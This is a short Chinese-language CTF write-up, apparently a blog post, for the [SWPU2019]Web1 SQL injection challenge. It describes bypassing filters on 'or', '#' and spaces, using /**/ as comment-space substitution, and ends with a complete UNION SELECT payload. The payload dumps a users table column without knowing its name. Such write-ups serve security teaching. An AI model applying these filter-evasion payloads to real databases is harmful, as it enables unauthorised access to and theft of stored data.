[SWPU2019]Web1

这个题目不是什么难题,是一道sql注入类型的题目,就是过滤了or,#,' '

过滤了#用单引号闭合'

过滤了空格就用/**/

注入点在

 

 在上面一行,不过要注意schema好像也被禁用了,直接用database() 来查询当前库就可以了,

总共有22个字段,这个是我没想到的,然后2和3是显示位。

最终payload:

1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

 

posted @ 2022-06-28 21:40  FPointmaple  阅读(40)  评论(0编辑  收藏  举报